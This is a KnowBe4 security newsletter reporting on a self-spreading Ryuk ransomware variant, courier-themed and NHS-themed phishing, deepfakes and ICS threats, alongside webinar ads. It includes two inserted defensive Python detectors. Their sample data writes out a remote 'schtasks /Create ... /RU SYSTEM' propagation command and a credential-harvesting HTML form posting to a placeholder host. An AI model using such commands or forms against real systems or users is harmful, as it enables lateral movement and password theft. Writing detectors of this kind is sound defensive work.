CyberheistNews Vol 11 #09 [Heads Up] New Ryuk Ransomware Strain Now Worms Itself To All Your Windows LAN Devices


A new Ryuk strain has a worm-like feature that allows it to spread to all other devices on victims' local networks. It was discovered by ANSSI, France's national cyber-security agency, while investigating an attack in early 2021.

"Through the use of scheduled tasks, the malware propagates itself - machine to machine - within the Windows domain," ANSSI (short for Agence Nationale de la Sécurité des Systèmes d'Information) said in a report (PDF). "Once launched, it will thus spread itself on every reachable machine on which Windows RPC accesses are possible."

Ryuk is a ransomware-as-a-service (RaaS) group first spotted in August 2018 that has left behind a long list of victims. It is at the top of the RaaS rankings, with its payloads being discovered in roughly one in three ransomware attacks throughout the last year. The group delivers payloads as part of multi-stage attacks using Emotet, BazarLoader, or TrickBot infection vectors for a quick way into their targets' networks, usually through phishing attacks.

Ryuk affiliates have been behind a massive wave of attacks on the US healthcare system starting in November 2020. They commonly ask for huge ransoms, having collected $34 million from just one victim last year. During the third quarter of 2020, Ryuk affiliates were observed hitting an average of 20 organizations every week.

Self-replication to other network devices

What makes this new Ryuk sample different is its capability to copy itself to other Windows devices on the victims' local networks.

To propagate itself over the local network, the new Ryuk variant lists all the IP addresses in the local ARP cache and sends what look like Wake-on-LAN (WOL) packets to each of the discovered devices. It then mounts every network share it finds on each device so that it can encrypt the contents.

Additionally, it can execute itself remotely using scheduled tasks created on each subsequently compromised network host with the help of the legitimate schtasks.exe Windows tool.

The Ryuk variant analyzed in this document does have self-replication capabilities. The propagation is achieved by copying the executable to identified network shares. This step is followed by the creation of a scheduled task on the remote machine. BleepingComputer has more detail and some mitigation suggestions, but it's a reboot nightmare and major network disruption if you get hit with one of these.
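The two steps ANSSI describes (copy the executable to a remote share, then create a scheduled task on that remote machine) leave a very recognizable pair of events in endpoint telemetry. The script below is an added example, not code from the article or from ANSSI's report, showing how a defender could correlate those two events: a file write to a target's admin share followed within a short window by a schtasks.exe /Create invocation aimed at that same target. The JSON event lines are constructed and simplified; they stand in for process-creation and file-write telemetry and are not any vendor's real schema.

```python
"""Detection heuristic for the propagation pattern described above: a
scheduled task created on a remote host with schtasks.exe shortly after a
file is written to that host's admin share.  Added example, not code from
the article or from ANSSI's report.  The JSON event shape below is a
constructed, simplified stand-in for endpoint telemetry (process creation
and file writes), not any vendor's real schema."""
from __future__ import annotations

import json
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample telemetry.  Only events 2 and 3 together form the
# suspicious pattern; event 5 is a remote task creation with no staging
# write, and event 4 is an ordinary local query.
SAMPLE_EVENTS = r"""
{"ts":"2021-01-15T09:01:02","host":"WS01","type":"file_write","user":"CORP\\jdoe","path":"C:\\Users\\jdoe\\report.docx"}
{"ts":"2021-01-15T09:02:10","host":"WS01","type":"file_write","user":"CORP\\svc_backup","path":"\\\\WS02\\C$\\Windows\\Temp\\upd.exe"}
{"ts":"2021-01-15T09:02:15","host":"WS01","type":"process","user":"CORP\\svc_backup","image":"C:\\Windows\\System32\\schtasks.exe","cmdline":"schtasks.exe /Create /S WS02 /RU SYSTEM /SC ONCE /ST 09:05 /TN upd /TR C:\\Windows\\Temp\\upd.exe"}
{"ts":"2021-01-15T09:30:00","host":"WS01","type":"process","user":"CORP\\admin","image":"C:\\Windows\\System32\\schtasks.exe","cmdline":"schtasks.exe /Query /TN backup"}
{"ts":"2021-01-15T10:00:00","host":"WS03","type":"process","user":"CORP\\admin","image":"C:\\Windows\\System32\\schtasks.exe","cmdline":"schtasks.exe /Create /S WS04 /TN patch /TR C:\\patch.exe /SC DAILY /ST 02:00"}
"""

# UNC path to an administrative share: \\HOST\C$\... or \\HOST\ADMIN$\...
ADMIN_SHARE = re.compile(r"^\\\\([^\\]+)\\(?:[A-Z]\$|ADMIN\$)\\", re.IGNORECASE)
CREATE_FLAG = re.compile(r"(?<!\S)/create(?!\S)", re.IGNORECASE)
# "/S <host>" selects a remote system; /SC and /ST are different switches
REMOTE_TARGET = re.compile(r"(?<!\S)/s\s+(\S+)", re.IGNORECASE)
RUN_AS_SYSTEM = re.compile(r"(?<!\S)/ru\s+system(?!\S)", re.IGNORECASE)


def parse_events(text: str) -> list[dict]:
    """Parse newline-delimited JSON events, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def detect_remote_task_propagation(events, window=timedelta(minutes=10)):
    """Return one finding per remote scheduled-task creation, rated 'high'
    when the source host wrote to the target's admin share within `window`."""
    events = sorted(events, key=lambda e: e["ts"])
    staging_writes = defaultdict(list)  # (SOURCE, TARGET) -> [timestamps]
    findings = []
    for ev in events:
        ts = datetime.fromisoformat(ev["ts"])
        if ev["type"] == "file_write":
            m = ADMIN_SHARE.match(ev["path"])
            if m:
                staging_writes[(ev["host"].upper(), m.group(1).upper())].append(ts)
            continue
        if ev["type"] != "process" or not ev["image"].lower().endswith("schtasks.exe"):
            continue
        cmd = ev["cmdline"]
        if not CREATE_FLAG.search(cmd):
            continue
        tgt = REMOTE_TARGET.search(cmd)
        if not tgt or tgt.group(1).upper() in {ev["host"].upper(), "LOCALHOST", "127.0.0.1"}:
            continue  # local task creation is routine admin activity, not this pattern
        target = tgt.group(1).upper()
        staged = [w for w in staging_writes[(ev["host"].upper(), target)]
                  if ts - window <= w <= ts]
        reasons = [f"remote scheduled task created on {target} from {ev['host']}"]
        if staged:
            reasons.append("preceded by a file write to the target's admin share")
        if RUN_AS_SYSTEM.search(cmd):
            reasons.append("task runs as SYSTEM")
        findings.append({
            "ts": ev["ts"], "source": ev["host"], "target": target,
            "user": ev["user"], "severity": "high" if staged else "medium",
            "reasons": reasons,
        })
    return findings


if __name__ == "__main__":
    for f in detect_remote_task_propagation(parse_events(SAMPLE_EVENTS)):
        print(f["severity"].upper(), f["ts"], f["source"], "->", f["target"],
              "|", "; ".join(f["reasons"]))
```

On the sample data this produces one high-severity finding (WS01 staged a file on WS02's C$ share and created a task there five seconds later, running as SYSTEM) and one medium-severity finding for the unstaged remote task from WS03. Local task creation is deliberately ignored because it is everyday administration; the signal here is the remote target plus the preceding share write.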

Blog post with links:
[Live Demo] Ridiculously Easy Security Awareness Training and Phishing

Old-school awareness training does not hack it anymore. Your email filters have an average 7-10% failure rate; you need a strong human firewall as your last line of defense.

Join us TOMORROW, Wednesday, March 3 @ 2:00 PM (ET), for a live demonstration of how KnowBe4 introduces a new-school approach to security awareness training and simulated phishing.

Get a look at new features and see how easy it is to train and phish your users.
  • NEW! AI Recommended training suggestions based on your users’ phishing security test results.
  • NEW! Brandable Content feature gives you the option to add branded custom content to select training modules.
  • NEW! 2021 Training Modules were just published in the ModStore.
  • Did You Know? You can upload your own SCORM training modules into your account for home workers.
  • Active Directory Integration to easily upload user data, eliminating the need to manually manage user changes.
Find out how 35,000+ organizations have mobilized their end-users as their human firewall.

Date/Time: TOMORROW, Wednesday, March 3 @ 2:00 PM (ET)

Save My Spot!
New Scary Good Deepfake Videos of Tom Cruise Show the Threat to Society Is Very Real

InputMag wrote: "We are entering scary times. New deepfake videos of actor Tom Cruise have made their way onto TikTok under the handle @deeptomcruise, and boy do they look real.

They're so realistic, in fact, it's possible that you wouldn't even know they're computer-generated had you not been alerted by the account's handle. And they were made using not much more than sample footage of Cruise and deepfake technology that's getting easier for anyone to use.

Not even two years ago it would have been easy to differentiate between a real and an AI-generated video of somebody. But the technology is advancing so rapidly that we've reached a point of escape velocity, and it's obvious that deepfakery isn't going to be used just for innocent purposes, like animating pictures of your past relatives.

In a series of tweets, our friend Rachel Tobac, the CEO of SocialProof Security, warns that deepfakes like @deeptomcruise threaten to further erode public trust in a world where media literacy is poor and people already can't agree on what's true or false. Like the black and gold dress, where one person might notice giveaways that the Tom Cruise videos are synthesized, another might not know the signs of a fake and swear up and down that they're real.

"Just because you feel you can personally tell the difference between synthetic & authentic media, it doesn’t mean we’re good to go," she says. "It matters what the general public believes."

This is a powerful technology for nefarious social engineering purposes. KnowBe4's Netflix-quality Inside Man Season 3 Ep 11 shows how deepfakes can be used to hack into networks. You can create a free preview account in our ModStore and see that episode right now. You can also see Rachel Tobac in a series of pretexting videos with our Chief Hacking Officer Kevin Mitnick. InputMag has the full story. Check out those TikTok videos!

Blog post with links:
See How You Can Get Audits Done in Half the Time, Half the Cost and Half the Stress

You told us you have challenging compliance requirements, not enough time to get audits done, and keeping up with risk assessments and third-party vendor risk is a continuous problem.

KCM GRC is a SaaS-based platform that includes Compliance, Risk, Policy and Vendor Risk Management modules. KCM was developed to save you the maximum amount of time getting GRC done.

Join us TOMORROW, Wednesday, March 3 @ 1:00 PM (ET), for a 30-minute live product demonstration of KnowBe4's KCM GRC platform. Plus, get a look at new compliance management features we've added to make managing your compliance projects even easier!
  • NEW! Control guidance feature provides in-platform suggestions to help you create controls to meet your specific scopes and requirements.
  • Vet, manage and monitor your third-party vendors' security risk requirements.
  • Simplify risk management with an intuitive interface and simple workflow based on the well-recognized NIST 800-30.
  • Quick implementation with pre-built requirements templates for the most widely used regulations.
  • Dashboards with automated reminders to quickly see what tasks have been completed, not met, and past due.
Date/Time: TOMORROW, Wednesday, March 3 @ 1:00 PM (ET)

Save My Spot!
[Heads Up] Fresh Bogus FedEx and DHL Phishbait

You would think this phishing attack is so old and tired that they would stop using it. But no, it still works like a charm on people who are not trained well enough to spot the red flags. So I'm finding myself after 10 years warning against the same threats. Amazing, isn't it?

Researchers at Armorblox describe an ongoing phishing campaign that’s using phony FedEx and DHL shipping notifications as phishing lures.

“A few days ago, the Armorblox threat research team observed an email impersonating FedEx attempt to hit one of our customer environments,” the researchers write. “The email was titled ‘You have a new FedEx sent to you’ followed by the date the email was sent.

The email contained some information about the document to make it seem legitimate, along with links to view the supposed document.”

The emails contained links to the Quip document hosting service, where the attackers had set up a landing page with a link to a spoofed Office 365 login page. The DHL phishing scam used a similar technique.

“The email sender name was ‘DHL Express’ and title was ‘Your parcel has arrived’, including the victim’s email address at the end of the title,” Armorblox says. “The email informed victims that a parcel arrived for them at the post office, and that the parcel couldn’t be delivered due to incorrect delivery details.

The email includes attached shipping documents that victims are guided to check if they want to receive their delivery.” These emails contained an HTML attachment that opened what appeared to be a blurred-out spreadsheet behind an Adobe login box.

The login overlay had the user’s email address pre-filled in the first box, so the researchers believe the attackers were trying to trick the user into entering their email password rather than their Adobe account credentials.
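The DHL lure is a useful case for attachment triage because its tell-tale features are structural rather than visual: a form containing a password field, posting somewhere outside the attachment, with the recipient's own address already filled in. The script below is an added example, not code from the article or from Armorblox, that scans an HTML attachment for exactly those traits using only the standard library. Both sample attachments are constructed, and collector.invalid is a placeholder host.

```python
"""Triage heuristic for HTML e-mail attachments of the kind described
above: a page that draws a login box over a blurred document, pre-fills
the recipient's address and posts the password elsewhere.  Added example,
not code from the article or from Armorblox.  Sample attachments are
constructed; collector.invalid is a placeholder host."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed phishing-style attachment: only the structure the article
# describes (overlay login form, pre-filled e-mail), no branding assets.
PHISH_SAMPLE = """<html><body>
<img src="blurred-sheet.png" alt="document preview">
<div class="overlay">
  <form method="post" action="https://collector.invalid/submit">
    <input type="text" name="email" value="jane@example.com" readonly>
    <input type="password" name="passwd">
    <input type="submit" value="Sign in">
  </form>
</div></body></html>"""

# Constructed benign attachment: a shipping table, no credential form.
BENIGN_SAMPLE = """<html><body><h1>Shipment 123</h1>
<table><tr><td>Status</td><td>In transit</td></tr></table>
</body></html>"""


class FormScanner(HTMLParser):
    """Collect, per <form>, its action URL, whether it has a password
    field, and any pre-filled value that looks like an e-mail address."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._cur = None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}  # boolean attrs arrive as None
        if tag == "form":
            self._cur = {"action": a.get("action", ""), "password": False,
                         "prefilled_email": None}
            self.forms.append(self._cur)
        elif tag == "input" and self._cur is not None:
            kind = a.get("type", "text").lower()
            if kind == "password":
                self._cur["password"] = True
            elif kind in ("text", "email", "hidden") and "@" in a.get("value", ""):
                self._cur["prefilled_email"] = a["value"].strip().lower()

    def handle_endtag(self, tag):
        if tag == "form":
            self._cur = None


def score_html_attachment(html: str, recipient_email: str) -> list:
    """Return the reasons this attachment looks like a credential lure
    (an empty list for a clean file)."""
    scanner = FormScanner()
    scanner.feed(html)
    reasons = []
    for form in scanner.forms:
        host = urlparse(form["action"]).hostname
        if form["password"] and host:
            reasons.append(f"password form posts to external host {host}")
        elif form["password"]:
            # relative or empty action: still a password prompt inside mail
            reasons.append("password form inside an e-mail attachment")
        if form["prefilled_email"] == recipient_email.lower():
            reasons.append("recipient address pre-filled in login form")
    return reasons


if __name__ == "__main__":
    for label, sample in (("phish", PHISH_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, score_html_attachment(sample, "jane@example.com"))
```

A mail gateway or SOAR playbook can run this over HTML attachments with the envelope recipient as the second argument; the pre-filled address is the detail that separates the mailbox-password harvest described above from a generic login page, so it is worth scoring separately from the external form target.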

The researchers conclude that people should use a combination of training and technical defenses such as two-factor authentication to defend themselves against these attacks.

Blog post with links:
Hacking Multifactor Authentication: An IT Pro’s Lessons Learned After Testing 150 MFA Products

Multifactor Authentication (MFA) can be a highly effective way to safeguard your organization’s data, but that doesn’t mean it’s unhackable. And nobody knows that better than award-winning author and Data-Driven Defense Evangelist at KnowBe4, Roger Grimes. While researching his most recent book Hacking Multifactor Authentication, Roger tested over 150 MFA solutions. And he wants to share what he learned with you!

Join Roger as he discusses the good, the bad, and the ugly lessons he learned from his research. He’ll share with you what works, what doesn’t, and what you should absolutely avoid.

In this webinar you’ll learn about:
  • Differences between various MFA tools and why they matter
  • Real-world hacking techniques Roger used to expose MFA weaknesses
  • What makes MFA software weak or strong and what that means to you
  • Tips on choosing the best MFA software for your company
  • Why a strong human firewall is your best last line of defense
Get the details you need to know to become a better IT security defender. Plus, earn CPE credit for attending!

Date/Time: Wednesday, March 10 @ 2:00 PM (ET)

Save My Spot!
New Scientific Research Helps CISOs Quantify The Value of a Strong Security Culture

Bradley Barth at SC Magazine reported: "Building a security awareness training program to develop a strong InfoSec culture requires time and money, and chief information security officers frequently try to make a case for such an investment by citing return on investment and other metrics of success.

Such demonstrable proof can be elusive, but this week, KnowBe4 researchers released the results of a comprehensive study examining the behavior and security culture of more than 97,000 employees across 1,115 organizations worldwide.

The goal was to see if they could quantify the correlation between implementing a strong security culture and the reduction of unwanted phishing behaviors such as link clicking and credential sharing. Obviously, they have an inversely proportional relationship: as training and awareness improve, risky behaviors go down. But by how much?

Now we know: KnowBe4 found that employees at companies with good security culture/training were 52x less likely to practice risky credential sharing behaviors than workers at companies with poor security culture/training.

KnowBe4 claims its study is the first to ever fully quantify this correlation, noting that researchers compiled the data by measuring the behaviors of employees using a phishing assessment platform, and then combining those results with responses from a scientific security culture survey."

Full article with links to the study (PDF, no registration required):

Let's stay safe out there.

Warm Regards,

Stu Sjouwerman
Founder and CEO
KnowBe4, Inc

Quotes of the Week
"The search for the truth is the most important work in the whole world,
and the most dangerous."

- James Clavell - Writer (1924 - 1994)

"Success is not the key to happiness. Happiness is the key to success.
If you love what you are doing, you will be successful."

- Albert Schweitzer - Humanitarian (1875 - 1965)

Thanks for reading CyberheistNews

Security News
Phishing Targets Industrial Control Systems

Phishing continues to be a primary initial access vector in cyberattacks against industrial control systems, according to researchers at Dragos. Out of the fifteen threat groups tracked by the security firm, ten rely on spearphishing attachments to compromise their victims, and thirteen abuse valid accounts to maintain persistence.

STIBNITE, a threat actor that targets wind turbine companies in Azerbaijan, uses fake login pages and malware-laden documents to compromise its victims. “STIBNITE gains initial access via credential theft websites spoofing Azerbaijan government organizations and phishing campaigns using variants of malicious Microsoft Office documents,” Dragos says.

“STIBNITE also used information related to the global COVID-19 pandemic for malicious document themes.” TALONITE, a threat group that focuses on the US electric sector, uses spearphishing to deliver malicious documents.

“TALONITE’s phishing campaigns utilize electric and power grid engineering specific themes and concepts, indicating an intent to gain a foothold within energy sector entities,” the researchers write. “Such access could facilitate gathering host and identity information, collecting sensitive operational data, or mapping the enterprise environment to identify points of contact with ICS.

The identified infrastructure and phishing emails spoofed the National Council of Examiners for Engineering and Surveying (NCEES), North American Electric Reliability Corporation (NERC), the American Society of Civil Engineers (ASCE), and Global Energy Certification (GEC).”

Dragos stresses that malicious cyber activity targeting industrial control systems is increasing, with four new ICS-targeting threat actors spotted in 2020.

“Data from our YIR report shows that this trend corresponds with a 3X rise in ICS-focused threats,” said Dragos’ CEO, Robert M. Lee. “The convergence of an increasingly ICS-aware and capable threat landscape with the trend towards more network connectivity means that the practical observations and lessons learned contained in our 2020 YIR report are timely as the community continues to work to provide safe and reliable operations.”

Dragos has the story:
How to Trick People Into Handing Over Their Information

The layout of online forms has a significant impact on how likely users are to hand over their personal information, according to Professor Lior Fink from Ben-Gurion University. On the CyberWire’s Hacking Humans podcast, Professor Fink described an experiment in which users were convinced to submit their personal information through a sign-up form.

The researchers found that users were more likely to enter their information if the form was arranged in a certain manner. “One thing was to simply arrange the items in an ascending privacy intrusion order,” Fink said. “We ordered the items of the information that they are asked to provide first is their less intrusive information, and then the items are arranged in an increasing order, and the last items are those that require the most sensitive information.”

The users were also more likely to enter their details if the sign-up form spanned multiple pages, since the intended marks would be likely to feel that they had already committed to the process.

“The second mechanism was to break down information items across several pages,” Fink said. “So instead of having the entire form on one page, they had to answer a question – each question appeared on a different page, and they had to submit their answers for each question separately. So the idea was to draw the one-foot-in-the-door theory.

So it's the same way as the marketing person wants to put the foot in the door and ask you to do something small to increase the likelihood that you'll do something larger. We applied the same principles and ideas in those online forms. So we ask for smaller things at the beginning to increase the likelihood that they will continue and fill out the entire form.”

Fink explained that using multiple pages could also trick the user into submitting information without feeling like they had sent anything. “The idea behind a multiple-page manipulation was, as long as you don't submit the form or move across pages, the information is still yours, right?” Fink said.

“I mean, you still haven't submitted it. It's still just text you put in a form. But then once you press – move to the next page, basically the info was sent to the server, probably placed in the database. So you already sort of revealed something about yourself.”

These techniques aren’t inherently malicious, but attackers use similar tactics in phishing attacks. Fink concluded that people should focus on learning when to pay closer attention to what they’re doing in order to avoid handing over sensitive information.

“In a lot of the literature on your heuristics and biases, awareness is an important thing,” Fink said. “But, I mean, it's one thing to say that awareness is important and another thing to say how to actually increase awareness.

Because we are doing a lot of things during the day, we're very cognitively busy, and we want to be very efficient in what we do, so a lot of times we've learned to do things without proper attention. So I guess that the best recommendation would be to simply identify the instances when you need to invest more attention in things.”

New-school security awareness training can help your employees avoid falling for phishing attacks by teaching them how to recognize social engineering tactics.

The CyberWire has the story:
More NHS-Themed COVID-19 Vaccine Phishing

A phishing campaign spoofing the UK’s National Health Service has surged its output, Infosecurity Magazine reports. Researchers at Mimecast warn that the attackers behind the campaign are sending 350% more emails than previously observed.

“The latest campaign informs recipients they have been selected for a jab based on family and medical history, using the trusted brand of the Health Service and the promise of protection from the deadly virus to socially engineer victims,” Infosecurity writes. “Information including name, date of birth and credit card details handed over by any unsuspecting recipients can then be sold on the dark web and/or used in follow-on fraud, according to Mimecast.”

Carl Wearn, head of e-crime at Mimecast, told the publication that social engineering is a key part of most cyberattacks.

“The majority of online scams rely on some form of human error, as it is far easier to compromise a single user than a whole system,” Wearn said. “Threat actors know this well and are continuing to exploit the human factor by tailoring scams to target current events and the fears of their victims.

Cyber-criminals are clever and continuously adapting their tactics. Don't click on suspicious links and never open unexpected email attachments. If you are concerned about whether vaccine information is legitimate, call your GP or take an independent route to check the website.”

These types of phishing scams can be expected to continue as vaccines are rolled out around the world. Some of these scams try to convince the user to hand over their personal and financial information, while others attempt to trick the victim into installing malware. Others simply try to get the user to pay money for a phony offer of a vaccine.

New-school security awareness training can help your employees recognize and thwart social engineering attacks in their personal and professional lives.

Infosecurity Magazine has the story:
What KnowBe4 Customers Say

PhishER is an essential part of your critical security workstream that saves the Incident Response team a huge amount of time.

Question: "How much time do you spend active inside of PhishER and how many messages do you get daily?"

Answer: "We may spend about an hour in the console among 5 people during the course of a week. We receive anywhere from 40 to 100+ reports a day. We average around 1000-1500 reports a month.

We have set our PML scores relatively low so more than 90% of our reported items get auto resolved via AI/ML and/or the actions I have made.

When AI/ML isn’t confident enough, our analysts get alerted to manually triage. We call these “undetermined emails”. This is what the hour a week is spent on."

Discuss this topic at KnowBe4's HackBusters Users Forum:
The 10 Interesting News Items This Week
    1. Hack of Software Provider Accellion Sets Off Global Ripple Effects:

    2. Why boards of private businesses must prioritize cybersecurity:

    3. We would not survive a true first strike cyberattack:

    4. Global Accellion data breaches linked to Clop ransomware gang:

    5. Hackers Tied to Russia's GRU Targeted the US Grid for Years:

    6. New 'LazyScripter' Hacking Group Targets Airlines:

    7. Reuters: Chinese spyware code was copied from America's NSA:

    8. Cybercrime groups are selling their hacking skills. Some countries are buying:

    9. New malware found on 30,000 Macs has security pros stumped:

    10. Clubhouse Chats Are Breached, Raising Concerns Over Security:
Cyberheist 'Fave' Links
This Week's Links We Like, Tips, Hints and Fun Stuff

Copyright © 2014-2021 KnowBe4, Inc. All rights reserved.
